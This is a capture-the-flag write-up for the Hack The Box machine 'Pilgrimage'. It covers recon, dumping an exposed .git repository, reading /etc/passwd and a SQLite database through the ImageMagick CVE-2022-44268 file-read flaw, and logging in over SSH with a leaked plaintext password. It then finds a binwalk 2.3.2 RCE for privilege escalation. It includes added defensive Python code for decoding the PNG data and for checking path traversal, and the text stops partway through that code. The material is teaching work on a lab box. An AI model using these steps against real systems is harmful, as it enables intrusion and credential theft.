[HTB] Pilgrimage

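Preface

Although this is an Easy-rated box on HTB, it is actually a bit tricky. It mainly tests your information-gathering skills and experience. Worth a try.

Information gathering

nmap scan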

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.219
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 16:02 CST
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.27s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo nmap -sV -sT -O -p22,80 10.10.11.219
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 16:07 CST
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http nginx 1.18.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 5.0 - 5.3 (95%), Linux 4.15 - 5.6 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.96 seconds

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo nmap --script=vuln 10.10.11.219
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 16:08 CST
Stats: 0:06:37 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 16:15 (0:00:05 remaining)
Stats: 0:13:02 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.01% done; ETC: 16:22 (0:00:07 remaining)
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-git:
| 10.10.11.219:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-fileupload-exploiter: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=pilgrimage.htb
| Found the following possible CSRF vulnerabilities:
|
| Path: http://pilgrimage.htb:80/
| Form id: filename
| Form action: /
|
| Path: http://pilgrimage.htb:80/dashboard.php
| Form id:
| Form action: /login.php
|
| Path: http://pilgrimage.htb:80/register.php
| Form id:
| Form action: /register.php
|
| Path: http://pilgrimage.htb:80/login.php
| Form id:
|_ Form action: /login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-enum:
| /login.php: Possible admin folder
|_ /.git/HEAD: Git folder

Nmap done: 1 IP address (1 host up) scanned in 1021.09 seconds

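In short: ports 80 and 22 are open, and the site's Git repository was never removed. Gathering information from that git repository is definitely a step to consider next.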

whatweb

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo whatweb http://10.10.11.219
http://10.10.11.219 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx/1.18.0], IP[10.10.11.219], RedirectLocation[http://pilgrimage.htb/], Title[301 Moved Permanently], nginx[1.18.0]
http://pilgrimage.htb/ [200 OK] Bootstrap, Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0], IP[10.10.11.219], JQuery, Script, Title[Pilgrimage - Shrink Your Images], nginx[1.18.0]

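The first whatweb request shows a redirect, so we add the redirect target http://pilgrimage.htb/ to our hosts file. We now also have a rough picture of the site's technology stack.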

nikto

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sudo nikto -h http://pilgrimage.htb
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.219
+ Target Hostname: pilgrimage.htb
+ Target Port: 80
+ Start Time: 2023-07-11 15:20:56 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Admin login page/section found.
+ /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7973 requests: 6 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-07-11 16:18:44 (GMT8) (3468 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

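Because of latency, the scan can be very slow. The good news is that it still gave us useful information: the files under .git tell us that the site owner did not remove the .git folder when putting the web service online, which very likely leads to source code disclosure. We will download it with a tool later and take a look.

Web penetration

Browsing the site manually

Since nmap found a website on port 80, let's visit it first and see what it looks like.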

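The site lets you upload an image, then shrinks it and returns a link to the resulting image. The login and registration pages are of little use and do not lead to any admin back-end login page.

Now that we know what service the site offers, how is it implemented? We first googled whether pilgrimage is some common off-the-shelf service, and it is not. Manual browsing gives us nothing more for now, so let's go back to the .git source leak we found earlier and see whether that path works.

.git source code leak

We use the GitHack tool to extract the site's git files.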

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ python3 ~/Tools/GitHack-master/GitHack.py http://pilgrimage.htb/.git
[+] Download and parse index file ...
[+] assets/bulletproof.php
[+] assets/css/animate.css
[+] assets/css/custom.css
[+] assets/css/flex-slider.css
[+] assets/css/fontawesome.css
[+] assets/css/owl.css
[+] assets/css/templatemo-woox-travel.css
[+] assets/images/banner-04.jpg
[+] assets/images/cta-bg.jpg
[+] assets/js/custom.js
[+] assets/js/isotope.js
[+] assets/js/isotope.min.js
[+] assets/js/owl-carousel.js
[+] assets/js/popup.js
[+] assets/js/tabs.js
[+] assets/webfonts/fa-brands-400.ttf
[+] assets/webfonts/fa-brands-400.woff2
[+] assets/webfonts/fa-regular-400.ttf
[+] assets/webfonts/fa-regular-400.woff2
[+] assets/webfonts/fa-solid-900.ttf
[+] assets/webfonts/fa-solid-900.woff2
[+] assets/webfonts/fa-v4compatibility.ttf
[+] assets/webfonts/fa-v4compatibility.woff2
[+] dashboard.php
[+] index.php
[+] login.php
[+] logout.php
[+] magick
[+] register.php
[+] vendor/bootstrap/css/bootstrap.min.css
[+] vendor/bootstrap/js/bootstrap.min.js
[+] vendor/jquery/jquery.js
[+] vendor/jquery/jquery.min.js
[+] vendor/jquery/jquery.min.map
[+] vendor/jquery/jquery.slim.js
[+] vendor/jquery/jquery.slim.min.js
[+] vendor/jquery/jquery.slim.min.map
[OK] assets/bulletproof.php
[OK] assets/css/custom.css
[OK] assets/css/flex-slider.css
[OK] assets/css/owl.css
[OK] assets/js/custom.js
[OK] assets/css/fontawesome.css
[OK] assets/images/cta-bg.jpg
[OK] assets/js/popup.js
[OK] assets/css/templatemo-woox-travel.css
[OK] assets/js/isotope.min.js
[OK] assets/js/isotope.js
[OK] assets/webfonts/fa-regular-400.woff2
[OK] assets/webfonts/fa-regular-400.ttf
[OK] assets/js/owl-carousel.js
[OK] assets/css/animate.css
[OK] dashboard.php
[OK] assets/webfonts/fa-v4compatibility.woff2
[OK] assets/webfonts/fa-v4compatibility.ttf
[OK] index.php
[OK] logout.php
[OK] login.php
[OK] assets/webfonts/fa-brands-400.woff2
[OK] register.php
[OK] vendor/bootstrap/css/bootstrap.min.css
[OK] vendor/bootstrap/js/bootstrap.min.js
[OK] vendor/jquery/jquery.min.js
[OK] assets/webfonts/fa-brands-400.ttf
[OK] assets/webfonts/fa-solid-900.woff2
[OK] vendor/jquery/jquery.slim.min.js
[OK] vendor/jquery/jquery.slim.min.map
[OK] vendor/jquery/jquery.js
[OK] vendor/jquery/jquery.min.map
[OK] assets/webfonts/fa-solid-900.ttf
[OK] vendor/jquery/jquery.slim.js
[OK] assets/js/tabs.js
[OK] assets/images/banner-04.jpg
[OK] magick

Again because of the VPN connection, the download was very slow... but at least it finished. Let's look at the contents.

┌──(kali㉿kali)-[~/HTB/Pilgrimage/pilgrimage.htb]
└─$ ll
total 26960
drwxr-xr-x 6 kali kali 4096 Jul 11 17:48 assets
-rw-r--r-- 1 kali kali 5538 Jul 11 17:48 dashboard.php
-rw-r--r-- 1 kali kali 9250 Jul 11 17:48 index.php
-rw-r--r-- 1 kali kali 6822 Jul 11 17:48 login.php
-rw-r--r-- 1 kali kali 98 Jul 11 17:48 logout.php
-rw-r--r-- 1 kali kali 27555008 Jul 11 18:35 magick
-rw-r--r-- 1 kali kali 6836 Jul 11 17:48 register.php
drwxr-xr-x 4 kali kali 4096 Jul 11 17:48 vendor

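With so many files, what should we look at first? index.php, of course. We want to understand how the image-shrinking service is implemented and whether that implementation has an exploitable vulnerability, so this is the file to read first.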

<?php
session_start();
require_once "assets/bulletproof.php";

function isAuthenticated() {
    return json_encode(isset($_SESSION['user']));
}

function returnUsername() {
    return "\"" . $_SESSION['user'] . "\"";
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $image = new Bulletproof\Image($_FILES);
    if($image["toConvert"]) {
        $image->setLocation("/var/www/pilgrimage.htb/tmp");
        $image->setSize(100, 4000000);
        $image->setMime(array('png','jpeg'));
        $upload = $image->upload();
        if($upload) {
            $mime = ".png";
            $imagePath = $upload->getFullPath();
            if(mime_content_type($imagePath) === "image/jpeg") {
                $mime = ".jpeg";
            }
            $newname = uniqid();
            exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);
            unlink($upload->getFullPath());
            $upload_path = "http://pilgrimage.htb/shrunk/" . $newname . $mime;
            if(isset($_SESSION['user'])) {
                $db = new PDO('sqlite:/var/db/pilgrimage');
                $stmt = $db->prepare("INSERT INTO `images` (url,original,username) VALUES (?,?,?)");
                $stmt->execute(array($upload_path,$_FILES["toConvert"]["name"],$_SESSION['user']));
            }
            header("Location: /?message=" . $upload_path . "&status=success");
        }
        else {
            header("Location: /?message=Image shrink failed&status=fail");
        }
    }
    else {
        header("Location: /?message=Image shrink failed&status=fail");
    }
}

?>

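The top of the file tells us plainly: exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);. The site uses magick to shrink the image to half its size. We happened to download the magick binary as well, so let's check its version directly.

Besides the service it uses, the file also kindly tells us where the site's database lives: $db = new PDO('sqlite:/var/db/pilgrimage');. We will definitely want to find a way to look at it later; it might give us login credentials that a user has reused.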

┌──(kali㉿kali)-[~/HTB/Pilgrimage/pilgrimage.htb]
└─$ ./magick -version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

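We can see the version is ImageMagick 7.1.0-49. Searching exp-db for a usable vulnerability, we find there is indeed one: https://github.com/voidz0r/CVE-2022-44268.

Magick arbitrary file read vulnerability

Verifying the PoC

This version of magick has an arbitrary file read vulnerability, and the PoC is described in detail. Let's try to reproduce it and see whether the PoC works.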

  1. git clone https://github.com/voidz0r/CVE-2022-44268

  2. cargo run "/etc/passwd"

  3. This generates an image. We upload that image to the target site and download the image it returns.

  4. Then we can analyse the returned image.

    ┌──(kali㉿kali)-[~/HTB/Pilgrimage]
    └─$ identify -verbose output.png
    Image: output.png
    Format: PNG (Portable Network Graphics)
    Geometry: 100x100
    Class: PseudoClass
    Type: palette
    Depth: 1 bits-per-pixel component
    Channel Depths:
    Red: 1 bits
    Green: 1 bits
    Blue: 1 bits
    Channel Statistics:
    Red:
    Minimum: 65535.00 (1.0000)
    Maximum: 65535.00 (1.0000)
    Mean: 65535.00 (1.0000)
    Standard Deviation: 0.00 (0.0000)
    Green:
    Minimum: 0.00 (0.0000)
    Maximum: 0.00 (0.0000)
    Mean: 0.00 (0.0000)
    Standard Deviation: 0.00 (0.0000)
    Blue:
    Minimum: 0.00 (0.0000)
    Maximum: 0.00 (0.0000)
    Mean: 0.00 (0.0000)
    Standard Deviation: 0.00 (0.0000)
    Colors: 2
    0: (255, 0, 0) red
    1: (255,255,255) white
    Gamma: 0.45455
    Chromaticity:
    red primary: (0.64,0.33)
    green primary: (0.3,0.6)
    blue primary: (0.15,0.06)
    white point: (0.3127,0.329)
    Filesize: 1.1Ki
    Interlace: No
    Orientation: Unknown
    Background Color: #FEFEFE
    Border Color: #DFDFDF
    Matte Color: #BDBDBD
    Page geometry: 100x100+0+0
    Compose: Over
    Dispose: Undefined
    Iterations: 0
    Compression: Zip
    Png:IHDR.color-type-orig: 3
    Png:IHDR.bit-depth-orig: 1
    Raw profile type:

    1437
    726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a6461656d
    6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e3a2f7573722f7362696e2f
    6e6f6c6f67696e0a62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e
    2f6e6f6c6f67696e0a7379733a783a333a333a7379733a2f6465763a2f7573722f736269
    6e2f6e6f6c6f67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f
    62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f7573722f67616d
    65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e3a783a363a31323a6d616e3a
    2f7661722f63616368652f6d616e3a2f7573722f7362696e2f6e6f6c6f67696e0a6c703a
    783a373a373a6c703a2f7661722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f
    6c6f67696e0a6d61696c3a783a383a383a6d61696c3a2f7661722f6d61696c3a2f757372
    2f7362696e2f6e6f6c6f67696e0a6e6577733a783a393a393a6e6577733a2f7661722f73
    706f6f6c2f6e6577733a2f7573722f7362696e2f6e6f6c6f67696e0a757563703a783a31
    303a31303a757563703a2f7661722f73706f6f6c2f757563703a2f7573722f7362696e2f
    6e6f6c6f67696e0a70726f78793a783a31333a31333a70726f78793a2f62696e3a2f7573
    722f7362696e2f6e6f6c6f67696e0a7777772d646174613a783a33333a33333a7777772d
    646174613a2f7661722f7777773a2f7573722f7362696e2f6e6f6c6f67696e0a6261636b
    75703a783a33343a33343a6261636b75703a2f7661722f6261636b7570733a2f7573722f
    7362696e2f6e6f6c6f67696e0a6c6973743a783a33383a33383a4d61696c696e67204c69
    7374204d616e616765723a2f7661722f6c6973743a2f7573722f7362696e2f6e6f6c6f67
    696e0a6972633a783a33393a33393a697263643a2f72756e2f697263643a2f7573722f73
    62696e2f6e6f6c6f67696e0a676e6174733a783a34313a34313a476e617473204275672d
    5265706f7274696e672053797374656d202861646d696e293a2f7661722f6c69622f676e
    6174733a2f7573722f7362696e2f6e6f6c6f67696e0a6e6f626f64793a783a3635353334
    3a36353533343a6e6f626f64793a2f6e6f6e6578697374656e743a2f7573722f7362696e
    2f6e6f6c6f67696e0a5f6170743a783a3130303a36353533343a3a2f6e6f6e6578697374
    656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d6e6574776f72
    6b3a783a3130313a3130323a73797374656d64204e6574776f726b204d616e6167656d65
    6e742c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e
    0a73797374656d642d7265736f6c76653a783a3130323a3130333a73797374656d642052
    65736f6c7665722c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f
    6c6f67696e0a6d6573736167656275733a783a3130333a3130393a3a2f6e6f6e65786973
    74656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d74696d6573
    796e633a783a3130343a3131303a73797374656d642054696d652053796e6368726f6e69
    7a6174696f6e2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c
    6f67696e0a656d696c793a783a313030303a313030303a656d696c792c2c2c3a2f686f6d
    652f656d696c793a2f62696e2f626173680a73797374656d642d636f726564756d703a78
    3a3939393a3939393a73797374656d6420436f72652044756d7065723a2f3a2f7573722f
    7362696e2f6e6f6c6f67696e0a737368643a783a3130353a36353533343a3a2f72756e2f
    737368643a2f7573722f7362696e2f6e6f6c6f67696e0a5f6c617572656c3a783a393938
    3a3939383a3a2f7661722f6c6f672f6c617572656c3a2f62696e2f66616c73650a

    Date:create: 2023-07-11T12:39:40+00:00
    Date:modify: 2023-07-11T12:39:40+00:00
    Date:timestamp: 2023-07-11T12:39:40+00:00
    Signature: c7d03a3453434db9720fd67b559185125d9bdb1fe9c25c182783170e2ba6a8f6
    Tainted: False
    Elapsed Time: 0m:0.001572s
    Pixels Per Second: 6.1Mi
  5. Following the instructions, convert the hexadecimal data to characters and look at the result.

    ┌──(kali㉿kali)-[~/HTB/Pilgrimage]
    └─$ python3 -c 'print(bytes.fromhex("<the hex data from above>"))'
    b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:103:109::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nemily:x:1000:1000:emily,,,:/home/emily:/bin/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n_laurel:x:998:998::/var/log/laurel:/bin/false\n'
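  6. Exploit successful!

By reading /etc/passwd we not only confirmed that the vulnerability exists, but also found a user on the system: emily. The next step is to find a way to get emily's password.

Naturally the first thing to try was reading the shadow file directly as a shortcut, but that does not work. So our hope rests on the database we found earlier giving us something useful.

Reading the database

The steps are the same as above, except that step 2 becomes cargo run "/var/db/pilgrimage"; then repeat the rest. Step 5 does need a change, though: sqlite needs the database file in binary form, so we convert the hex back to binary. This can be done with xxd, which ships with Linux (xxd -r -ps).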

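┌──(kali㉿kali)-[~/HTB/Pilgrimage] # the returned data is too long, so save it to a file for easier handling
└─$ identify -verbose sql.png > sql

┌──(kali㉿kali)-[~/HTB/Pilgrimage] # delete everything except the hexadecimal data
└─$ vim sql

┌──(kali㉿kali)-[~/HTB/Pilgrimage] # convert the data to binary: -r turns hex back into binary, -ps means plain hexdump style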
└─$ xxd -r -ps sql sql.db
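
Instead of trimming identify output by hand, the embedded data from both the /etc/passwd step and the database step can be read straight from the PNG's text chunks; the same scan shows which already-converted files in an output directory carry embedded file content. This is an added example, not code from the original post or the PoC repository. It assumes the data sits in a tEXt or zTXt chunk whose keyword starts with "Raw profile type" and whose text is a decimal length line followed by hex lines, as in the identify output above; the sample PNG is constructed inside the code.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MAX_TEXT = 16 * 1024 * 1024  # cap on inflated zTXt size (guards against decompression bombs)

def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk, verifying length and CRC."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos < len(png):
        if pos + 12 > len(png):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 12 + length
        if end > len(png):
            raise ValueError("truncated %r chunk" % ctype)
        data = png[pos + 8:end - 4]
        if zlib.crc32(ctype + data) != struct.unpack(">I", png[end - 4:end])[0]:
            raise ValueError("bad CRC in %r chunk" % ctype)
        yield ctype, data
        if ctype == b"IEND":
            return
        pos = end

def text_chunks(png: bytes):
    """Yield (keyword, text) for every tEXt and zTXt chunk."""
    for ctype, data in iter_chunks(png):
        if ctype not in (b"tEXt", b"zTXt"):
            continue
        keyword, _, rest = data.partition(b"\x00")
        if ctype == b"zTXt":
            if rest[:1] != b"\x00":  # only compression method 0 (deflate) is defined
                continue
            inflater = zlib.decompressobj()
            rest = inflater.decompress(rest[1:], MAX_TEXT)
            if inflater.unconsumed_tail:
                raise ValueError("zTXt chunk inflates past MAX_TEXT")
        yield keyword.decode("latin-1"), rest.decode("latin-1")

def decode_raw_profile(text: str):
    """Parse '[name] / decimal length / hex lines'; return (declared_length, data)."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    # The length is the first non-empty line, or the second when a name precedes it.
    # Only those two positions are tested: hex of ASCII digits is itself all digits.
    idx = 0 if lines and lines[0].isdigit() else 1
    if len(lines) <= idx or not lines[idx].isdigit():
        raise ValueError("raw profile has no length line")
    return int(lines[idx]), bytes.fromhex("".join(lines[idx + 1:]))

def embedded_profiles(png: bytes):
    """Return one dict per 'Raw profile type' text chunk found in the PNG."""
    found = []
    for keyword, text in text_chunks(png):
        if keyword.lower().startswith("raw profile type"):
            declared, data = decode_raw_profile(text)
            found.append({"keyword": keyword, "declared": declared,
                          "length_ok": declared == len(data), "data": data})
    return found

def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk (used only to build the constructed sample)."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))

def build_sample_png(payload: bytes) -> bytes:
    """Constructed fixture: a pixel-less PNG whose zTXt chunk holds `payload` as a raw profile."""
    hexed = payload.hex()
    body = "\n".join(hexed[i:i + 72] for i in range(0, len(hexed), 72))
    text = "\n\n%8d\n%s\n" % (len(payload), body)
    ihdr = struct.pack(">IIBBBBB", 100, 100, 1, 3, 0, 0, 0)
    ztxt = b"Raw profile type\x00\x00" + zlib.compress(text.encode("latin-1"))
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"zTXt", ztxt) + chunk(b"IEND", b"")

if __name__ == "__main__":
    sample = b"demo:x:1000:1000:constructed sample:/home/demo:/bin/sh\n"  # constructed, not real data
    for hit in embedded_profiles(build_sample_png(sample)):
        print(hit["keyword"], hit["declared"], hit["length_ok"], hit["data"])
```

Writing the returned data to a file in binary mode gives the same result as xxd -r -ps. Legitimate EXIF or ICC profiles are reported as well, so the decoded bytes still need a look.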

With the data processed, we load it into sqlite3 and take a look.

┌──(kali㉿kali)-[~/HTB/Pilgrimage]
└─$ sqlite3 sql.db
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .databases
main: /home/kali/HTB/Pilgrimage/sql.db r/w
sqlite> .table
images users
sqlite> select * from users
...> ;
emily|abigchonkyboi123
asd|asd
toto|toto
sqlite> .exit

The users table happens to contain emily's password, so we have to try logging in to the system over SSH.

Gaining a foothold

┌──(kali㉿kali)-[~/HTB/Pilgrimage/pilgrimage.htb]
└─$ ssh emily@10.10.11.219
emily@10.10.11.219's password:
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
emily@pilgrimage:~$

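Login succeeds, and the user flag is right there in emily's home directory.

Privilege escalation

The usual three checks

Start with sudo -l: no permission. Look for SUID files: nothing found. Check crontab: nothing there. So, nothing at all.

Manual browsing

Looking around, we did not see anything special either.

Automated enumeration

Time to bring out the big guns: upload linpeas.sh and look at the results.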

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused

Current user has other interactive shells running
680 /bin/bash /usr/sbin/malwarescan.sh
748 /bin/bash /usr/sbin/malwarescan.sh
1420 /bin/sh ./linpeas.sh

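Nothing else stands out, but this part is worth a look. First we check whether the sudo tokens it mentions can be abused. Looking it up, the precondition is the same user, with the password unknown, where another terminal has entered the sudo password within the last 15 minutes; the current terminal can then run sudo commands without a password. Running ps aux shows that malwarescan.sh is run by the root user, so this technique does not apply.

Even though that was not usable, malwarescan.sh is after all a shell script run by root, so let's read its contents and see whether anything in it can be used to escalate privileges.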

emily@pilgrimage:/usr/sbin$ cat malwarescan.sh 
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
    filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
    binout="$(/usr/local/bin/binwalk -e "$filename")"
    for banned in "${blacklist[@]}"; do
        if [[ "$binout" == *"$banned"* ]]; then
            /usr/bin/rm "$filename"
            break
        fi
    done
done

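The contents match the script's name: it scans files and deletes any whose type is on the blacklist.

We notice that every binary in the script is carefully invoked by absolute path, so the idea of sneaking in through PATH is a dead end. Do any of these binaries have vulnerabilities we can use? Let's go through them one by one. inotifywait is mainly used to monitor files; here it continuously monitors (-m) file creation under /var/www/pilgrimage.htb/shrunk/. A search turned up no way to use it for privilege escalation. echo, tail and sed need no examination. That leaves binwalk as the last candidate; if it has nothing either, we will have to think of something else.

Let's check the binwalk version first.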

emily@pilgrimage:/usr/sbin$ /usr/local/bin/binwalk -h

Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk

Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...

binwalk privilege escalation

Searching exp-db shows that this version of binwalk does have an RCE vulnerability.

┌──(kali㉿kali)-[~/HTB/Pilgrimage/pilgrimage.htb]
└─$ searchsploit binwalk 2.3.2
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Binwalk v2.3.2 - Remote Command Execution (RCE) | python/remote/51249.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results

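Looking into it, the cause is a flaw in binwalk's path-traversal protection when parsing PFS files, which lets an attacker craft a malicious file that traverses paths directly. When binwalk's -e option is used to auto-extract that malicious file, the vulnerability triggers and the files embedded in the crafted file are written to a path outside the extraction directory. This can also lead to remote code execution.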
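
The flaw class described above, a containment check applied to a path that has not been resolved yet, shown next to a check that resolves first and then compares path components. This is an added illustration, not binwalk's source code; the function names, the entry names and the directory layout are constructed for the example.

```python
import os
import tempfile

def naive_target(out_dir: str, name: str) -> str:
    """Flawed containment check (illustration only).

    os.path.join() does not collapse '..' segments, so for a relative name the
    joined string always begins with out_dir and the guard can never fire.
    """
    path = os.path.join(out_dir, name)
    if not path.startswith(out_dir):
        raise ValueError("blocked: %r" % name)
    return path

def safe_target(out_dir: str, name: str) -> str:
    """Resolve first, then compare whole path components."""
    base = os.path.realpath(out_dir)
    # realpath collapses '..' and follows symlinks that already exist on disk
    path = os.path.realpath(os.path.join(base, name))
    # commonpath compares components, so /x/out-evil is not "inside" /x/out
    if os.path.commonpath([base, path]) != base:
        raise ValueError("blocked: %r" % name)
    return path

def audit(out_dir: str, names, check):
    """Map each entry name to 'inside', 'ESCAPES' or 'BLOCKED' under the given check."""
    base = os.path.realpath(out_dir)
    result = {}
    for name in names:
        try:
            resolved = os.path.realpath(check(out_dir, name))
        except ValueError:
            result[name] = "BLOCKED"
            continue
        inside = os.path.commonpath([base, resolved]) == base
        result[name] = "inside" if inside else "ESCAPES"
    return result

# Constructed archive entry names
SAMPLE_NAMES = [
    "firmware/rootfs.bin",          # ordinary entry
    "../../../outside/dropped.py",  # relative traversal
    "/abs/dropped.py",              # absolute name: join() discards out_dir
    "link/dropped.py",              # goes through a symlink that points outside
]

def demo():
    """Run both checks against a throwaway directory tree; nothing is written to the targets."""
    with tempfile.TemporaryDirectory() as tmp:
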